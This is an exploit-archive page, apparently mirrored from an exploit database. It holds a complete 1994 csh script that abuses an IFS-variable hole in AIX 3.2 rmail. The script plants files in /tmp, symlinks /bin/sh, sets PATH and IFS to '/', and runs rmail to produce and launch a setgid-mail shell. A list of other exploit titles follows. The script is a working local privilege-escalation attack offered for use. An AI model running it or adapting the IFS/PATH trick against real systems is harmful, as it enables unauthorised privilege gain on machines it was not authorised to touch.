#source: https://www.securityfocus.com/bid/454/info # #Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. # #!/bin/csh # IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994 # Setup needed files. mkdir /tmp/.rmail cd /tmp/.rmail cat << EOF > usr cp sh mailsh chmod 2777 mailsh EOF chmod 777 usr ln -s /bin/sh . # Set PATH, IFS, and run rmail. setenv PATH .:$PATH setenv IFS / echo "cheezy mail hack" | rmail joeuser@nohost.com unsetenv IFS rm -f usr sh # minor cleanup. echo "Attempting to run sgid shell." ./mailsh
anonymous
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)
Huawei Router HG532 - Arbitrary Command Execution
Linux kernel < 4.10.15 - Race Condition Privilege Escalation
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
ProFTPd 1.3.5 - File Copy
Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
WordPress Plugin Relevanssi - 'category_name' SQL Injection
Apache Libcloud Digital Ocean API - Local Information Disclosure
Recent Exploits
Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation
Sitecore 8.x - Deserialization Remote Code Execution
FusionPBX 4.4.3 - Remote Command Execution
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting
phpMyAdmin 4.8 - Cross-Site Request Forgery
WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution
ProShow 9.0.3797 - Local Privilege Escalation
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)
Ubuntu 18.04 - 'lxd' Privilege Escalation